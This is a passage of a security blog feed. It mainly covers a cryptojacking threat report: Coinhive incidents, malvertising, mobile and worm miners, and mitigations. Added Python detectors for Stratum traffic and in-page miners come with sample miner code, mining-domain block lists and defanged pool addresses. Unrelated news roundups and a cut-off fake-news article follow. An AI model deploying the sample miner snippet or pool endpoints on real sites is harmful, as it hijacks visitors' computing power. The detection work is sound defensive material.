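    print(result)
    print("cryptojacking:", is_cryptojacking(result))
    print("Content-Security-Policy:", recommended_csp("www.site.example"))
```

The throttle figure is worth surfacing on its own: an authorised miner is usually configured to leave most of the CPU idle, while the injected scripts described in this post ran at 80 percent.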

The following are some real-world examples of Coinhive being deployed in the wild:

  • In September 2017, Bleeping Computer reported that the authors of SafeBrowse, a Chrome extension with more than 140,000 users, had embedded the Coinhive script in the extension's code that allowed for the mining of Monero using users' computers and without getting their consent.
  • During mid-September 2017, users on Reddit began complaining about increased CPU usage when they navigated to a popular torrent site, The Pirate Bay (TPB). The spike in CPU usage was a result of Coinhive's script being embedded within the site's footer. According to TPB operators, it was implemented as a test to generate passive revenue for the site (Figure 8).
  • In December 2017, researchers with Sucuri reported on the presence of the Coinhive script being hosted on GitHub.io, which allows users to publish web pages directly from GitHub repositories.
  • Other reporting disclosed the Coinhive script being embedded on the Showtime domain as well as on the LA Times website, both surreptitiously mining Monero.
  • A majority of in-browser cryptojacking activity is transitory in nature and will last only as long as the user’s web browser is open. However, researchers with Malwarebytes Labs uncovered a technique that allows for continued mining activity even after the browser window is closed. The technique leverages a pop-under window surreptitiously hidden under the taskbar. As researchers pointed out, closing the browser window may not be enough to interrupt the activity, and that more advanced actions like running the Task Manager may be required.


Figure 8: Statement from TPB operators on Coinhive script

Malvertising and Exploit Kits

Malvertisements – malicious ads on legitimate websites – commonly redirect visitors of a site to an exploit kit landing page. These landing pages are designed to scan a system for vulnerabilities, exploit those vulnerabilities, and download and execute malicious code onto the system. Notably, the malicious advertisements can be placed on legitimate sites and visitors can become infected with little to no user interaction. This distribution tactic is commonly used by threat actors to widely distribute malware and has been employed in various cryptocurrency mining operations.

The following are some real-world examples of this activity:

  • In early 2018, researchers with Trend Micro reported that a modified miner script was being disseminated across YouTube via Google's DoubleClick ad delivery platform. The script generated a random number between 1 and 100; when the number was above 10 it launched the Coinhive script coinhive.min.js, configured to use 80 percent of the CPU to mine Monero, and when the number was below 10 it launched a modified Coinhive script that was also configured to use 80 percent of the CPU to mine Monero. This custom miner connected to the mining pool wss[:]//ws[.]l33tsite[.]info:8443, which was likely done to avoid Coinhive's fees.
  • In April 2018, researchers with Trend Micro also discovered Coinhive-based JavaScript injected into an AOL ad platform. The miner used the following private mining pools: wss[:]//wsX[.]www.datasecu[.]download/proxy and wss[:]//www[.]jqcdn[.]download:8893/proxy. Examination of other sites compromised by this campaign showed that in at least some cases the operators were hosting malicious content on unsecured AWS S3 buckets.
  • Since July 16, 2017, FireEye has observed the Neptune Exploit Kit redirect to ads for hiking clubs and MP3 converter domains. Payloads associated with the latter include Monero CPU miners that are surreptitiously installed on victims' computers.
  • In January 2018, Check Point researchers discovered a malvertising campaign leading to the Rig Exploit Kit, which served the XMRig Monero miner utility to unsuspecting victims.

Mobile Cryptojacking

In addition to targeting enterprise servers and user machines, threat actors have also targeted mobile devices for cryptojacking operations. While this technique is less common, likely due to the limited processing power afforded by mobile devices, cryptojacking on mobile devices remains a threat as sustained power consumption can damage the device and dramatically shorten the battery life. Threat actors have been observed targeting mobile devices by hosting malicious cryptojacking apps on popular app stores and through drive-by malvertising campaigns that identify users of mobile browsers.

The following are some real-world examples of mobile devices being used for cryptojacking:

  • During 2014, FireEye iSIGHT Intelligence reported on multiple Android malware apps capable of mining cryptocurrency:
    • In March 2014, Android malware named "CoinKrypt" was discovered, which mined Litecoin, Dogecoin, and CasinoCoin currencies.
    • In March 2014, another form of Android malware – "Android.Trojan.MuchSad.A" or "ANDROIDOS_KAGECOIN.HBT" – was observed mining Bitcoin, Litecoin, and Dogecoin currencies. The malware was disguised as copies of popular applications, including "Football Manager Handheld" and "TuneIn Radio." Variants of this malware have reportedly been downloaded by millions of Google Play users.
    • In April 2014, Android malware named "BadLepricon," which mined Bitcoin, was identified. The malware was reportedly being bundled into wallpaper applications hosted on the Google Play store, at least several of which received 100 to 500 installations before being removed.
    • In October 2014, a type of mobile malware called "Android Slave" was observed in China; the malware was reportedly capable of mining multiple virtual currencies.
  • In December 2017, researchers with Kaspersky Labs reported on a new multi-faceted Android malware capable of a variety of actions including mining cryptocurrencies and launching DDoS attacks. The resource load created by the malware has reportedly been high enough that it can cause the battery to bulge and physically destroy the device. The malware, dubbed Loapi, is unique in the breadth of its potential actions. It has a modular framework that includes modules for malicious advertising, texting, web crawling, Monero mining, and other activities. Loapi is thought to be the work of the same developers behind the 2015 Android malware Podec, and is usually disguised as an anti-virus app.
  • In January 2018, SophosLabs released a report detailing their discovery of 19 mobile apps hosted on Google Play that contained embedded Coinhive-based cryptojacking code, some of which were downloaded anywhere from 100,000 to 500,000 times.
  • Between November 2017 and January 2018, researchers with Malwarebytes Labs reported on a drive-by cryptojacking campaign that affected millions of Android mobile browsers to mine Monero.

Cryptojacking Spam Campaigns

FireEye iSIGHT Intelligence has observed several cryptocurrency miners distributed via spam campaigns, a commonly used tactic to indiscriminately distribute malware. We expect malicious actors will continue to use this method to disseminate cryptojacking code for as long as cryptocurrency mining remains profitable.

In late November 2017, FireEye researchers identified a spam campaign delivering a malicious PDF attachment designed to appear as a legitimate invoice from the largest port and container service in New Zealand: Lyttelton Port of Christchurch (Figure 9). Once opened, the PDF launched a PowerShell script that downloaded a Monero miner from a remote host. The malicious miner connected to the pools supportxmr.com and nanopool.org.


Figure 9: Sample lure attachment (PDF) that downloads malicious cryptocurrency miner

Additionally, a massive cryptojacking spam campaign was discovered by FireEye researchers during January 2018 that was designed to look like legitimate financial services-related emails. The spam email directed victims to an infection link that ultimately dropped a malicious ZIP file onto the victim's machine. Contained within the ZIP file was a cryptocurrency miner utility (MD5: 80b8a2d705d5b21718a6e6efe531d493) configured to mine Monero and connect to the minergate.com pool. While each of the spam email lures and associated ZIP filenames were different, the same cryptocurrency miner sample was dropped across all observed instances (Table 2).

ZIP Filenames

california_540_tax_form_2013_instructions.exe
state_bank_of_india_money_transfer_agency.exe
format_transfer_sms_banking_bni_ke_bca.exe
confirmation_receipt_letter_sample.exe
sbi_online_apply_2015_po.exe
estimated_tax_payment_coupon_irs.exe
how_to_add_a_non_us_bank_account_to_paypal.exe
western_union_money_transfer_from_uk_to_bangladesh.exe
can_i_transfer_money_from_bank_of_ireland_to_aib_online.exe
how_to_open_a_business_bank_account_with_bad_credit_history.exe
apply_for_sbi_credit_card_online.exe
list_of_lucky_winners_in_dda_housing_scheme_2014.exe

Table 2: Sampling of observed ZIP filenames delivering cryptocurrency miner

Cryptojacking Worms

Following the WannaCry attacks, actors began to increasingly incorporate self-propagating functionality within their malware. Some of the observed self-spreading techniques have included copying to removable drives, brute forcing SSH logins, and leveraging the leaked NSA exploit EternalBlue. Cryptocurrency mining operations significantly benefit from this functionality since wider distribution of the malware multiplies the amount of CPU resources available to them for mining. Consequently, we expect that additional actors will continue to develop this capability.

The following are some real-world examples of cryptojacking worms:

  • In May 2017, Proofpoint reported a large campaign distributing mining malware "Adylkuzz." This cryptocurrency miner was observed leveraging the EternalBlue exploit to rapidly spread itself over corporate LANs and wireless networks. This activity included the use of the DoublePulsar backdoor to download Adylkuzz. Adylkuzz infections create botnets of Windows computers that focus on mining Monero.
  • Security researchers with Sensors identified a Monero miner worm, dubbed "Rarogminer," in April 2018 that would copy itself to removable drives each time a user inserted a flash drive or external HDD.
  • In January 2018, researchers at F5 discovered a new Monero cryptomining botnet that targets Linux machines. PyCryptoMiner is based on Python script and spreads via the SSH protocol. The bot can also use Pastebin for its command and control (C2) infrastructure. The malware spreads by trying to guess the SSH login credentials of target Linux systems. Once that is achieved, the bot deploys a simple base64-encoded Python script that connects to the C2 server to download and execute more malicious Python code.

Detection Avoidance Methods

Another trend worth noting is the use of proxies to avoid detection. Mining proxies are an attractive option for cyber criminals because they allow them to avoid developer and commission fees of 30 percent or more. Avoiding common cryptojacking services such as Coinhive, Crypto-Loot, and Deepminer, and instead hosting cryptojacking scripts on actor-controlled infrastructure, can circumvent many of the common strategies used to block this activity via domain or file name blacklisting.

In March 2018, Bleeping Computer reported on the use of cryptojacking proxy servers and determined that as the use of cryptojacking proxy services increases, the effectiveness of ad blockers and browser extensions that rely on blacklists decreases significantly.

Several mining proxy tools can be found on GitHub, such as the XMRig Proxy tool, which greatly reduces the number of active pool connections, and the CoinHive Stratum Mining Proxy, which uses Coinhive’s JavaScript mining library to provide an alternative to using official Coinhive scripts and infrastructure.

In addition to using proxies, actors may also establish their own self-hosted miner apps, either on private servers or on cloud-based servers that support Node.js. Although private servers may provide some benefit over using a commercial mining service, they are still subject to easy blacklisting and require more operational effort to maintain. According to Sucuri researchers, cloud-based servers provide many benefits to actors looking to host their own mining applications, including:

  • Available free or at low-cost
  • No maintenance, just upload the crypto-miner app
  • Harder to block as blacklisting the host address could potentially impact access to legitimate services
  • Resilient to permanent takedown as new hosting accounts can more easily be created using disposable accounts

The combination of proxies and crypto-miners hosted on actor-controlled cloud infrastructure presents a significant hurdle to security professionals, as both make cryptojacking operations more difficult to detect and take down.

Mining Victim Demographics

Based on data from FireEye detection technologies, the detection of cryptocurrency miner malware has increased significantly since the beginning of 2018 (Figure 10), with the most popular mining pools being minergate and nanopool (Figure 11), and the most heavily affected country being the U.S. (Figure 12). Consistent with other reporting, the education sector remains most affected, likely due to more relaxed security controls across university networks and students taking advantage of free electricity to mine cryptocurrencies (Figure 13).


Figure 10: Cryptocurrency miner detection activity per month


Figure 11: Commonly observed pools and associated ports


Figure 12: Top 10 affected countries


Figure 13: Top five affected industries


Figure 14: Top affected industries by country

Mitigation Techniques

Unencrypted Stratum Sessions

According to security researchers at Cato Networks, in order to participate in pool mining, the infected machine has to run native or JavaScript-based code that speaks the Stratum protocol over TCP or HTTP/S. Stratum uses a publish/subscribe architecture: clients send subscription requests to join a pool, and the server publishes messages (new jobs, difficulty changes) to its subscribed clients. These messages are simple, readable, newline-delimited JSON-RPC. Subscription requests include the following entities: id, method, and params (Figure 15). A deep packet inspection (DPI) engine can be configured to look for these parameters, together with Stratum method names such as mining.subscribe, in order to block Stratum over unencrypted TCP. Note that id, method and params are present in every JSON-RPC request, not only Stratum, so a rule that matches on those keys alone will also fire on legitimate JSON-RPC APIs; the method name is what makes the rule specific.


Figure 15: Stratum subscription request parameters
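The following is an added example of the detection logic described above, written for this page in Python; it is not code from the report or from Cato Networks. It reassembles a captured TCP payload into newline-delimited JSON-RPC messages, applies the structural id/method/params check, and then requires a method name from an assumed list of Stratum mining methods (STRATUM_METHODS, covering classic mining.* methods and the login/submit/job vocabulary used by Monero miners such as XMRig) before raising an alert. The sample payload is constructed for the example.

```python
"""Detect unencrypted Stratum mining traffic in captured TCP payloads.

Added example for this page (not FireEye's or Cato Networks' code).
Stratum is newline-delimited JSON-RPC, so the detector splits a payload
into lines, parses each as JSON and checks for the id/method/params
shape. Because every JSON-RPC client shares that shape, an alert is only
raised when the method name is in the Stratum mining vocabulary below.
"""
import json

# Assumed list of Stratum method names: the mining.* methods of Stratum v1
# (Bitcoin-style pools) and the login-based variant spoken by Monero miners
# such as XMRig. Extend it from your own captures.
STRATUM_METHODS = {
    "mining.subscribe", "mining.authorize", "mining.submit",
    "mining.notify", "mining.set_difficulty", "mining.extranonce.subscribe",
    "login", "submit", "job", "keepalived", "getjob",
}


def parse_jsonrpc_lines(payload: bytes):
    """Yield (raw_line, obj) for each line of the payload that parses as a JSON object."""
    for raw in payload.split(b"\n"):
        raw = raw.strip()
        if not raw:
            continue
        try:
            obj = json.loads(raw.decode("utf-8"))
        except (UnicodeDecodeError, ValueError):
            continue  # not JSON (e.g. an HTTP request line sharing the segment)
        if isinstance(obj, dict):
            yield raw, obj


def looks_like_jsonrpc(obj: dict) -> bool:
    """The structural check from the text: id, method and params all present."""
    return "id" in obj and "method" in obj and "params" in obj


def stratum_alerts(payload: bytes):
    """Return a list of alert dicts for Stratum messages found in the payload."""
    alerts = []
    for raw, obj in parse_jsonrpc_lines(payload):
        if not looks_like_jsonrpc(obj):
            continue
        method = obj.get("method")
        if method not in STRATUM_METHODS:
            continue  # ordinary JSON-RPC, not a mining session
        params = obj.get("params")
        agent = None
        if isinstance(params, dict):            # XMRig-style: {"login":..,"agent":..}
            agent = params.get("agent")
        elif isinstance(params, list) and params and isinstance(params[0], str):
            agent = params[0]                   # mining.subscribe: ["user-agent/version"]
        alerts.append({"method": method, "agent": agent, "raw": raw.decode("utf-8")})
    return alerts


# Constructed sample: a Stratum v1 subscribe, an XMRig-style login, a benign
# JSON-RPC call and some non-JSON bytes, as a DPI engine might see in one segment.
SAMPLE_PAYLOAD = b"\n".join([
    b'{"id":1,"method":"mining.subscribe","params":["cpuminer/2.5.0"]}',
    b'{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"4AAAAAAAAAAA",'
    b'"pass":"x","agent":"XMRig/2.6.2"}}',
    b'{"id":7,"method":"eth_blockNumber","params":[]}',
    b'GET / HTTP/1.1',
])

if __name__ == "__main__":
    for alert in stratum_alerts(SAMPLE_PAYLOAD):
        print(alert["method"], alert["agent"])
```

Run against the constructed payload, the two miner handshakes are reported (with the user agent strings a pool would log) and the eth_blockNumber call is ignored even though it has the same id/method/params shape. The same function can be fed reassembled TCP stream data from a packet capture; it deliberately does nothing for TLS-wrapped sessions, which is the case the next subsection addresses.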

Encrypted Stratum Sessions

In the case of JavaScript-based miners running Stratum over HTTPS (in practice over a TLS-protected WebSocket, the wss:// pool addresses seen earlier in this report), detection is more difficult for DPI engines that do not decrypt TLS traffic. To mitigate encrypted mining traffic on a network, organizations may blacklist the IP addresses and domains of popular mining pools. The downside is the effort of identifying and updating the blacklist, as locating a reliable and continually updated list of popular mining pools can prove difficult and time consuming.

Browser-Based Sessions

Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers (as in the case of a compromised website). Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors.

As defenses evolve to prevent unauthorized coin mining activities, so will the techniques used by actors; however, blocking some of the most common indicators that we have observed to date may be effective in combatting a significant amount of the CPU-draining mining activities that customers have reported. Generic detection strategies for browser-based cryptocurrency mining include:

  • Blocking domains known to have hosted coin mining scripts
  • Blocking websites of known mining project websites, such as Coinhive
  • Blocking scripts altogether
  • Using an ad-blocker or coin mining-specific browser add-ons
  • Detecting commonly used naming conventions
  • Alerting and blocking traffic destined for known popular mining pools
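Below is an added example, written for this page and not taken from the report, that applies three of the strategies in the list above (a domain blocklist, script file-naming conventions, and mining-library API names) to a page's HTML rather than to network traffic, so it can be run over crawled or proxied page content. The indicator lists (MINING_DOMAINS, SCRIPT_NAME_PATTERNS, API_PATTERNS) are assumptions for illustration and should be populated from your own intelligence. As an extension of the list, it also reports any WebSocket (wss://) endpoint referenced in inline script: a miner served through an actor-controlled proxy evades the blocklisted domains but still has to open a Stratum-over-WebSocket connection. The sample HTML is constructed.

```python
"""Scan an HTML document for browser-based coin mining indicators.

Added example for this page, not code from the original report. Three
checks mirror the generic strategies in the text (known mining domains,
script naming conventions, mining API names) and a fourth reports any
wss:// endpoint in inline script, which self-hosted proxies still need.
All indicator lists are assumptions for illustration.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed indicator lists; extend them from your own observations.
MINING_DOMAINS = {"coinhive.com", "coin-hive.com", "authedmine.com",
                  "crypto-loot.com", "cryptoloot.pro"}
SCRIPT_NAME_PATTERNS = [re.compile(p, re.I) for p in
                        (r"coinhive(\.min)?\.js$", r"authedmine(\.min)?\.js$",
                         r"cryptonight", r"deepminer")]
API_PATTERNS = [re.compile(p) for p in
                (r"\bCoinHive\.(Anonymous|User|Token)\b",
                 r"\bCryptoNight\b", r"\bdeepMiner\b", r"\bCRLT\.")]
WSS_PATTERN = re.compile(r"wss?://[^\s'\"]+")


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from a page."""
    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def script_host(url: str) -> str:
    """Hostname of a script URL; protocol-relative (//host/x.js) URLs are common in injections."""
    if url.startswith("//"):
        url = "https:" + url
    return (urlparse(url).hostname or "").lower()


def scan_html(document: str):
    """Return a list of (indicator_type, evidence) tuples found in the HTML."""
    parser = ScriptCollector()
    parser.feed(document)
    findings = []
    for src in parser.external:
        host = script_host(src)
        if host and any(host == d or host.endswith("." + d) for d in MINING_DOMAINS):
            findings.append(("blocklisted_domain", src))
        path = urlparse(src).path
        if any(p.search(path) for p in SCRIPT_NAME_PATTERNS):
            findings.append(("script_name", src))      # self-hosted copies keep the name
    for body in parser.inline:
        for p in API_PATTERNS:
            for m in p.finditer(body):
                findings.append(("mining_api", m.group(0)))
        for m in WSS_PATTERN.finditer(body):
            findings.append(("websocket_endpoint", m.group(0)))
    return findings


# Constructed sample page: one blocklisted miner, a benign library, a self-hosted
# copy under a telltale name, and an inline script pointing at an actor-run proxy.
SAMPLE_HTML = """<html><head>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script src="//cdn.example.net/assets/jquery.min.js"></script>
<script src="https://static.example.org/js/cryptonight.wasm.js"></script>
<script>
  var miner = new CoinHive.Anonymous('SITEKEY', {throttle: 0.2});
  miner.start();
</script>
<script>
  var ws = new WebSocket('wss://proxy.example.invalid:8443/proxy');
</script>
</head><body>hello</body></html>"""

if __name__ == "__main__":
    for kind, evidence in scan_html(SAMPLE_HTML):
        print(kind, evidence)
```

On the sample page the scanner reports the Coinhive script twice (domain and file name), the self-hosted cryptonight file by name only, the CoinHive.Anonymous constructor in inline script, and the proxy WebSocket endpoint, while the jQuery include produces nothing. The websocket finding is the one to triage by hand: legitimate pages open WebSockets too, so it is a lead for analysts rather than a blocking rule.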

Some of these detection strategies may also be of use in blocking some mining functionality included in existing financial malware as well as mining-specific malware families.

It is important to note that JavaScript used in browser-based cryptojacking activity cannot access files on disk. However, if a host has inadvertently navigated to a website hosting mining scripts, we recommend purging cache and other browser data.

Outlook

In underground communities and marketplaces there has been significant interest in cryptojacking operations, and numerous campaigns have been observed and reported by security researchers. These developments demonstrate the continued upward trend of threat actors conducting cryptocurrency mining operations, and we expect this focus to continue throughout 2018. Notably, malicious cryptocurrency mining may be seen as preferable due to the perception that it does not attract as much attention from law enforcement as other forms of fraud or theft. Further, victims may not realize their computer is infected beyond a slowdown in system performance.

Due to its inherent privacy-focused features and CPU-mining profitability, Monero has become one of the most attractive cryptocurrency options for cyber criminals. We believe that it will continue to be threat actors' primary cryptocurrency of choice, so long as the Monero blockchain maintains privacy-focused standards and is ASIC-resistant. If in the future the Monero protocol ever downgrades its security and privacy-focused features, then we assess with high confidence that threat actors will move to use another privacy-focused coin as an alternative.

Because of the anonymity associated with the Monero cryptocurrency and electronic wallets, as well as the availability of numerous cryptocurrency exchanges and tumblers, attribution of malicious cryptocurrency mining is very challenging for authorities, and malicious actors behind such operations typically remain unidentified. Threat actors will undoubtedly continue to demonstrate high interest in malicious cryptomining so long as it remains profitable and relatively low risk.

Security newsround: July 2018

We round up reporting and research from across the web about the latest security news and developments. This month: stress test for infosec leaders, cybercrime by the numbers, financial fine for enabling cyber fraud, third party risk leads to Ticketmaster breach, Privacy Shield in jeopardy, and a win for Wi-Fi as security improves.

Under pressure: stress levels rise for security professionals

Tense, nervous headache? You might be working in information security. A global survey of 1,600 infosec leaders has found that the role is under more stress than ever. Rising malware threats, a shortage of skilled people, and budget constraints are producing a perfect storm of pressure on professionals. The findings come from Trustwave’s 2018 Security Pressures Report. It found that the trend of increasing stress has been edging steadily upwards since its first report five years ago.

Some 54 per cent of respondents experienced more pressure to secure their organisation in 2017 compared to the previous year. More than half (55 per cent) also expect 2018 to bring more pressure than 2017 did. Dark Reading quoted Chris Schueler of Trustwave saying the pressure to perform will push security leaders to improve performance or burn out. SecurityIntelligence led with the angle that the biggest obligation facing security professionals is preventing malware. Help Net Security has a thorough summary of the findings.

There was some good news: fewer professionals reported feeling pressure to buy the latest security tech compared to past years. The full report is available to download here.

CEO fraud scam hits companies hard

CEO fraud, AKA business email compromise, was the internet crime most commonly reported to the FBI during 2017. Victims lost a combined amount of more than $676 million last year, up almost 88 per cent compared to 2016. Total cybercrime-related losses totalled $1.42 billion last year. The data comes from the FBI’s 2017 Internet Crime Report, which it compiles from public complaints to the agency. (No vendor surveys or hype here.)

The next most prominent scams were ransomware, tech support fraud, and extortion, the FBI said. Corporate data breaches rose slightly in number year on year (3,785 in 2017, up from 3,403 in 2016) but the financial hit decreased noticeably ($60.9 million in 2017 vs $95.9 million in 2016). There were broadly similar numbers of fake tech support scams between 2017 and 2016, but criminals almost doubled their money. The trends in the report could help security professionals to evaluate potential risks to their own organisation and staff.

Asset manager’s lax oversight opens door to fraud and a fine

Interesting reading for security and risk professionals in the Central Bank of Ireland’s highly detailed account of a cyber fraud. Governance failings at Appian Asset Management led to it losing €650,000 in client funds to online fraud. Although Appian subsequently replaced the funds in the client’s account, the regulator fined the firm €443,000. A CBI investigation uncovered “significant regulatory breaches and failures” at the firm, which exposed it to the fraud. It’s the first time the Irish regulator has imposed such a sanction for cyber fraud.

The fraud took place over a two-month period, starting in April 2015. The CBI said a fraudster hacked the real client’s webmail account to impersonate them during email correspondence with an Appian employee. The fraudster also used a spoofing technique to mimic that employee’s email address. The criminal intercepted messages from the genuine client and sent replies from the fake employee email to hide traces of the scam.

The press release runs to more than 3,200 words, and also goes into great detail about the gaps in policy and risk management at Appian.

Tales from the script: third-party app flaw leads to Ticketmaster data breach

As growing numbers of websites rely on third-party scripts, it’s vital to check they don’t put sites’ security at risk. That’s one of the lessons from the data breach at Ticketmaster UK. The company discovered malicious code running on its website that was introduced via a customer chat feature. This exposed sensitive data, including payment details, of around 40,000 customers. Anyone who bought a ticket on its site between September 2017 and June 2018 could be at risk, Ticketmaster warned.

On discovering the breach, Ticketmaster disabled the code across all its sites. The company contacted all affected customers, recommending they change their passwords. It published a clearly worded statement to answer consumer questions, and offered free 12-month identity monitoring.

Although this first seemed like good crisis management and proactive breach notification, the story didn’t end there. Inbenta Technologies, which developed the chat feature, weighed in with a statement shifting some blame back towards Ticketmaster. The vulnerability came from a single piece of custom JavaScript code Inbenta had written for Ticketmaster. “Ticketmaster directly applied the script to its payments page, without notifying our team. Had we known that the customised script was being used this way, we would have advised against it, as it incurs greater risk for vulnerability,” Inbenta CEO Jordi Torras said.

Then Monzo, a UK bank, blogged in detail about the steps it took to protect its customers from the fallout. This included the bombshell that Ticketmaster knew about the breach in April, although the news only went public in June. Wired said these developments showed the need to thoroughly investigate potential breaches, and to remember subcontractors when assessing security risks.

Privacy Shield threat puts EU-US data sharing in doubt

US authorities have two months to start complying with Privacy Shield or else MEPs have threatened to suspend it. The EU-US data sharing framework replaced the Safe Harbor framework two years ago. Privacy Shield was supposed to extend the same rights for protecting EU citizens’ data as they have in Europe. In light of the Facebook-Cambridge Analytica scandal (both of which were certified under Privacy Shield), it seems that’s no longer the case.

MEPs consider privacy and data protection as “fundamental rights … that cannot be ‘balanced’ against commercial or political interests”. They voted 303 to 223 in favour of suspending the Privacy Shield agreement unless the US complies with it.

This could have implications for any organisation that uses a cloud service provider in the US. If they are using Privacy Shield as an adequacy decision for that agreement, they may no longer be GDPR-compliant after 1 September. Expect more developments on this over the coming months.

Welcome boost for Wi-Fi security

The Wi-Fi Alliance’s new WPA3 standard promises enhanced security for business and personal wireless networks. It will use a key establishment protocol called Simultaneous Authentication of Equals (SAE) which should prevent offline dictionary-based password cracking attempts. Announcing the standard, the Wi-Fi Alliance said the enterprise version offers “the equivalent of 192-bit cryptographic strength, providing additional protections for networks transmitting sensitive data, such as government or finance”. Hardware manufacturers including Cisco, Aruba, Broadcom and Aerohive all backed the standard.

Tripwire said WPA3 looks set to improve security for open networks, such as guest or customer networks in coffee shops, airports and hotels. The standard should also prevent passive nearby attackers from being able to monitor communication in the air. The Register said security experts have welcomed the upgrade. It quoted Professor Alan Woodward, a computer scientist at the University of Surrey in England. The new form of authentication, combined with extra strength from longer keys, is “a significant step forward”, he said.


The post Security newsround: July 2018 appeared first on BH Consulting.

Cyber Security Roundup for February 2018

February saw over 5,000 websites infected by cryptocurrency mining malware after a popular accessibility plugin called 'BrowseAloud' was compromised by hackers. This led to several UK Government and council websites going offline, including those of the Information Commissioner's Office, the Student Loans Company, and Manchester City, Camden and Croydon Councils. Symantec researchers also announced that 'cryptojacking' attacks had increased 1,200% in the UK. Cryptojacking once involved installing cryptocurrency mining malware on users' computers, but it is now more frequently done in-browser, by hacking a website and executing a malicious mining JavaScript when the user visits the compromised site, as was the case with the 'BrowseAloud' incident.

More than 25% of UK Councils are said to have suffered a breach in the last five years according to the privacy group Big Brother Watch, who said UK Councils are unprepared for Cyber Attacks.

There was a  fascinating report released about Artificial Intelligence (AI) Threat, written by 26 leading AI experts, the report forecasts the various malicious usages for AI, including with cybercrime, and manipulation of social media and national news media agendas.

GDPR preparation or panic, depending on your position, is gaining momentum with less than 100 days before the privacy regulation comes into force in late May. Here are some of the latest GDPR articles of note.

Digital Guardian released an interactive article where you can attempt to guess the value of various types of stolen data to cybercriminals: Digital Guardian: Do you know your data's worth?

Bestvpns released a comprehensive infographic covering the 77 Facts About Cyber Crime we should all know about in 2018.

February was yet another frantic month for security updates, which saw Microsoft release over 50 patches, and there were new critical security updates by Adobe, Apple, Cisco, Dell, and Drupal.


Cyber Security Roundup for January 2018

2018 started with a big security alert bang after Google Security Researchers disclosed serious security vulnerabilities in just about every computer processor in use on the planet. Named 'Meltdown' and 'Spectre’, when exploited by a hacker or malware, these vulnerabilities disclose confidential data. As a result, a whole raft of critical security updates was hastily released for computer and smartphone operating systems, web browsers, and processor drivers. While processor manufacturers have been rather lethargic in reacting and producing patches for the problem, software vendors such as Microsoft, Google and Apple have reacted quickly, releasing security updates to protect their customers from the vulnerable processors, kudos to them.

The UK Information Commissioner's Office (ICO) heavily criticised Carphone Warehouse for security inadequacies and fined the company £400K following its 2015 data breach, when the personal data, including bank details, of millions of Carphone Warehouse customers was stolen by hackers, in what the company at the time described as a "sophisticated cyber attack", where have we heard that excuse before? Certainly the ICO wasn't buying that after it investigated, reporting a large number of Carphone Warehouse security failures, which included the use of software that was six years out of date; lack of "rigorous controls" over who had login details to systems; no antivirus protection running on the servers holding data; the same root password being used on every individual server, which was known to "some 30-40 members of staff"; and the needless storage of full credit card details. Carphone Warehouse should thank its lucky stars the breach didn't occur after the General Data Protection Regulation comes into force, as with such a damning list of security failures the company may well have been fined considerably more by the ICO, which is granted vastly greater financial sanctions and powers when the GDPR kicks in in May.

The National Cyber Security Centre warned that UK national infrastructure faces serious nation-state attacks, stating it is a matter of "when" not "if". There were also claims that the cyberattacks against Ukraine in recent years were down to Russia testing and tuning its nation-state cyberattack capabilities.

At the Davos summit, the Maersk chairman revealed his company spent a massive £200m to £240m on recovering from the recent NotPetya ransomware outbreak, after the malware 'totally destroyed' the Maersk network. That's a huge price to pay for not regularly patching your systems.

It's no surprise that cybercriminals continue to target cryptocurrencies given the high financial rewards on offer. The most notable attack was a £290k cyber-heist from BlackWallet, where the hackers redirected 700k BlackWallet users to a fake replica BlackWallet website after compromising BlackWallet's DNS server. The replica website ran a script that transferred user cryptocurrency into the hacker's wallet, the hacker then moved currency into a different wallet platform.

In the United States, the Federal Trade Commission (FTC) fined toy firm VTech US$650,000 (£482,000) for violating US children's privacy law. The FTC alleged the toy company violated the Children's Online Privacy Protection Rule (COPPA) by collecting personal information from hundreds of thousands of children without providing direct notice.

It was reported that a POS malware infection at Forever21 and lapses in encryption were responsible for the theft of debit and credit card details from Forever21 stores late last year. Payment card data continues to be a high-value target for cyber crooks with sophisticated attack capabilities, who are willing to invest considerable resources to achieve their aims.

Several interesting cybersecurity reports were released in January. The Online Trust Alliance Cyber Incident & Breach Trends Report: 2017 concluded that cyber incidents doubled in 2017 and 93% were preventable. Carbon Black's 2017 Threat Report stated non-malware-based cyber-attacks were behind the majority of cyber-incidents reported in 2017, despite the proliferation of malware available to both professional and amateur hackers. Carbon Black also reported that ransomware attacks are inflicting significantly higher costs and that the number of attacks skyrocketed during the course of the year, no surprise there.

Malwarebytes 2017 State of Malware Report said ransomware attacks on consumers and businesses slowed down towards the end of 2017 and were being replaced by spyware campaigns, which rose by over 800% year-on-year. Spyware campaigns not only allow hackers to steal precious enterprise and user data but also allows them to identify ideal attack points to launch powerful malware attacks. The Cisco 2018 Privacy Maturity Benchmark Study claimed 74% of privacy-immature organisations were hit by losses of more than £350,000, and companies that are privacy-mature have fewer data breaches and smaller losses from cyber-attacks.


STOP FAKE NEWS – PAUSE, EVALUATE and FORWARD


The potential for fake news to go viral on social media is quite real. There have been several instances where rumours have incited mob violence between rival communities. The consequences got out of hand when illiterate tribal villagers in a remote Indian district received a WhatsApp message claiming that a gang was kidnapping children and selling their body parts. The message went viral in these villages, and mobs of up to 500 people pounced on strangers they suspected of being child kidnappers; in all there were two incidents in which seven people were lynched.
It is quite apparent to every cybercitizen that fake or distorted news is on the rise. Social media allows every individual a platform to disseminate such news or information. Fake news is routinely posted for vested interest such as political distortion, defamation, mischief, inciting trouble and to settle personal problems.

As aptly illustrated in the case above, when fake news goes viral the ill effects escalate to a point where they can cause physical damage, loss of life or long-term animosity between sections of society. Purposely-crafted fake or distorted news introduced over periods of time by vested interests can distort perspectives and social harmony. Such news is effectively used for ideological indoctrination.

Creation of fake news is extremely simple. Listed below are six commonly used methods:

  • Individuals concoct their own stories
  • Marketers release competitive advertisements based on unproven data
